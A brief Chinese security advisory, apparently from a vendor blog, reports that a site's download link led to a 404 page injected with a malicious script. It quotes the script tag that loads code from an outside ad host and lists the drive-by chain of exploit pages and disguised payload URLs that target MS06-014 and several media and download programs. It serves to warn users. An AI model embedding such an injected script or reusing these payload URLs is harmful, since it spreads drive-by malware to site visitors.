经过网友举报,http://www.mwsc.org.cn/恶意网站风暴中心上挂有恶意脚本。

通过检测发现在点击下载该HOSTS反黑文件的时候会访问一个404页面,该页面挂有恶意脚本的框架连接。

image002.jpg

点击下载之后,会转到一个404页面,其实根本没有那个反黑文件的资源可以下载,以下是404页面的代码:

image004.jpg其中有一段脚本调用:
<script language=”javascript” src=”http://ad.shitip.com/file/da.js”></script>
此脚本里判断了COOKIES,然后再调用了http://ad.shitip.com/file/ad.js
http://ad.shitip.com/file/ad.js是一个挂马集合模版:
包含:
http://ww.shitip.com/file/gdisvc.htm
–》06014漏洞页,下载http://ww.shitip.com/file/images/gdisvc.jpg以及
http://ww.shitip.com/file/images/top.jpg
其他的第3方软件漏洞页下载http://ww.shitip.com/file/images/gdisvc.jpg
包含有讯雷,PPS,REAL,QVOD,暴风。请及时网友们注意此类网站。
知道创宇的浏览器安全插件即将推出,敬请期待。安装该插件以后可以让网友尽情浏览网站。

Popularity: 19% [?]